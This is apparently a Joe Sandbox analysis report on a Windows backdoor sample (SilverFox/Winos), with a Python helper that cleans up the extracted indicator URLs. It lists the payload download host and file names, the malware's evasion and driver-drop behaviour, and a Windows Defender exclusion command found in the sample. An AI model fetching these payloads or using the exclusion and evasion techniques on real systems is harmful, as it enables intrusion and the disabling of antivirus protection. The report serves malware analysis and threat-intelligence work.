Windows Analysis Report
287438657364-7643738421.08.exe

Overview

General Information

Sample name: 287438657364-7643738421.08.exe
Analysis ID: 1585091
MD5: 12771744b7de8ffb1f0dddf3ac8ed2f4
SHA1: c05938c681c3c840a9e484bed33c48fcd033dd27
SHA256: 4df10f78a78892fea0c94ef9aca83ddac4045a1b2bec807f4bf563ac14551224
Tags: backdoor, exe, silverfox, winos, user-zhuzhu0009

Detection

Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
Sample is not signed and drops a device driver
Tries to detect virtualization through RDTSC time measurements
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Yara signature match

Classification

  • System is w10x64
  • O8xg2t.exe (PID: 3396 cmdline: C:\Users\user\Documents\O8xg2t.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • O8xg2t.exe (PID: 6880 cmdline: C:\Users\user\Documents\O8xg2t.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • O8xg2t.exe (PID: 6504 cmdline: C:\Users\user\Documents\O8xg2t.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • cleanup
No configs have been found
Source: 9.2.O8xg2t.exe.2900000.1.unpack
Rule: INDICATOR_SUSPICIOUS_DisableWinDefender
Description: Detects executables containing artifacts associated with disabling Windows Defender
Author: ditekSHen
Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Source: 7.2.O8xg2t.exe.27d0000.1.unpack
Rule: INDICATOR_SUSPICIOUS_DisableWinDefender
Description: Detects executables containing artifacts associated with disabling Windows Defender
Author: ditekSHen
Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Source: 6.2.O8xg2t.exe.2750000.1.unpack
Rule: INDICATOR_SUSPICIOUS_DisableWinDefender
Description: Detects executables containing artifacts associated with disabling Windows Defender
Author: ditekSHen
Strings:
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: 287438657364-7643738421.08.exe | Virustotal: Detection: 11%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown | HTTPS traffic detected: 39.103.20.48:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: Binary string: F:\Development\GS-DES\DES10.0\HKPROC\bin\x64\UnicodeRelease\HkApp.x64.pdb | source: 287438657364-7643738421.08.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb | source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe, 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000006.00000000.2411129760.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000002.2431285508.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000007.00000000.2425791156.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000000.2540851216.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe, 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmp, O8xg2t.exe.0.dr
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC320A1B8 FindFirstFileExW, 6_2_00007FFBC320A1B8
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BAA1B8 FindFirstFileExW, 9_2_00007FFBC1BAA1B8
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 6_2_000000014000DFFE
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 6_2_000000014000DDFF
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then movsxd rbx, qword ptr [r14+10h] | 6_2_0000000140011270
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 6_2_000000014000DE96
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 6_2_000000014000DEFB
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 6_2_000000014000E178
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 6_2_000000014000DDD9
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 9_2_000000014000DFFE
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 9_2_000000014000DDFF
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then movsxd rbx, qword ptr [r14+10h] | 9_2_0000000140011270
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 9_2_000000014000DE96
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 9_2_000000014000DEFB
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 9_2_000000014000E178
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 4x nop then mov rax, qword ptr [rsp+78h] | 9_2_000000014000DDD9
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /i.dat HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /a.gif HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /b.gif HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /c.gif HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /d.gif HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /s.dat HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /s.jpg HTTP/1.1 | User-Agent: GetData | Host: jylhok.oss-cn-beijing.aliyuncs.com | Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: jylhok.oss-cn-beijing.aliyuncs.com
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1003
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/C
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/Vm
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/Zm
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif6
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifws
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/q
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jylhok.oss-cn-beijing.aliyuncs.com/w
Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 39.103.20.48:443 -> 192.168.2.8:49708 version: TLS 1.2
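The memory-string hits listed above are noisy: the scanner reads past the terminating byte, so one URL shows up with trailing junk (a.gifW, a.giff, b.gifents, i.datta), two URLs run together (a.gif followed directly by a second https://...b.gif), and fragments such as /Vm or /7-2476756634-1003 are the URL prefix followed by whatever happened to sit next to it in memory. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample, that collapses such hits into a clean indicator list. The sample strings are copied from the entries above but are not the complete list, the extension allow-list used to cut off junk is an assumption, and the two bare certificate-policy URLs (d.symcb.com, www.digicert.com) are kept in the input so the host grouping shows how they separate from the payload host.

```python
import re
from collections import defaultdict

# Constructed sample: a selection of the "String found in binary or memory"
# values from the report above, including trailing junk and run-together
# URLs produced by memory scanning. Not the complete list from the report.
MEMORY_STRINGS = [
    "https://d.symcb.com/rpa0.",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1003",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/Vm",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif6",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta",
    "https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta",
    "https://www.digicert.com/CPS0",
]

# scheme + host (+ optional port) + the first "/"; finditer also catches a
# second URL glued onto the tail of the first one.
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?/")

# Assumption: a payload object name is <name>.<ext> with an extension from this
# allow-list; whatever follows the extension is junk from adjacent memory.
PATH_RE = re.compile(r"^[A-Za-z0-9_\-]+\.(?:gif|dat|exe|dll|zip|txt|jpg|png)")


def canonicalize(s):
    """Split one memory string into (root, path) tuples, one per URL found.

    root is scheme://host/ and path is the cleaned object name, or "" when the
    remainder carries no recognisable object name (e.g. "/Vm" or a SID
    fragment) and therefore only proves that the host string is present."""
    found = []
    for m in URL_RE.finditer(s):
        rest = s[m.end():]
        p = PATH_RE.match(rest)
        found.append((m.group(0), p.group(0) if p else ""))
    return found


def canonical_urls(strings):
    """Deduplicated, sorted list of cleaned URLs across all memory strings."""
    out = set()
    for s in strings:
        for root, path in canonicalize(s):
            out.add(root + path)
    return sorted(out)


def paths_by_host(strings):
    """root -> set of object names seen for that host ("" = root only)."""
    by_host = defaultdict(set)
    for s in strings:
        for root, path in canonicalize(s):
            by_host[root].add(path)
    return dict(by_host)


def payload_hosts(strings):
    """Hosts for which at least one real object name was recovered. Hosts that
    only ever appear as a bare root (typically certificate-policy URLs lifted
    from an embedded Authenticode chain) are left out of the hunting list."""
    return sorted(h for h, paths in paths_by_host(strings).items() if paths - {""})
```

Run over the sample, the payload host reduces to one OSS endpoint with five objects (a.gif, b.gif, c.gif, d.gif, i.dat) plus the bare root, and the two certificate-policy hosts drop out of payload_hosts. The i.dat entry lines up with the i[1].dat file the sample wrote to INetCache (System Summary section), which is the WinINet cache name for a fetched i.dat, so at least that download is corroborated by the report itself; the .gif names are the operator's choice and say nothing about the content served.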

System Summary

Source: 9.2.O8xg2t.exe.2900000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen
Source: 7.2.O8xg2t.exe.27d0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen
Source: 6.2.O8xg2t.exe.2750000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender | Author: ditekSHen
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140006C95 NtAllocateVirtualMemory
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140006C95 NtAllocateVirtualMemory
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe | File created: C:\Windows\System32\drivers\189atohci.sys
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000C3F0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000CC00
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140001A30
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000C2A0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400022C0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400110F0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140010CF0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140009300
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_000000014000BB70
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00000001400103D0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC320A1B8
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_00007FFBC3210248
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_000000014000C3F0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_000000014000CC00
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140001A30
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_000000014000C2A0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00000001400022C0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00000001400110F0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140010CF0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140009300
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_000000014000BB70
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00000001400103D0
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BB0248
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_00007FFBC1BAA1B8
Source: Joe Sandbox View | Dropped File: C:\Users\user\Documents\O8xg2t.exe | SHA256: D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: String function: 0000000140006A65 appears 56 times
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: String function: 0000000140004F10 appears 46 times
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevseamps.exe, vs 287438657364-7643738421.08.exe
Source: 9.2.O8xg2t.exe.2900000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender
Source: 7.2.O8xg2t.exe.27d0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender
Source: 6.2.O8xg2t.exe.2750000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifacts associated with disabling Windows Defender
Source: 189atohci.sys.0.dr | Binary string: \Device\Driver\
Source: 189atohci.sys.0.dr | Binary string: \Device\TrueSight
Source: classification engine | Classification label: mal80.evad.winEXE@4/12@1/1
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 9_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer
Source: C:\Users\user\Documents\O8xg2t.exe | Code function: 6_2_0000000140001430 GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle
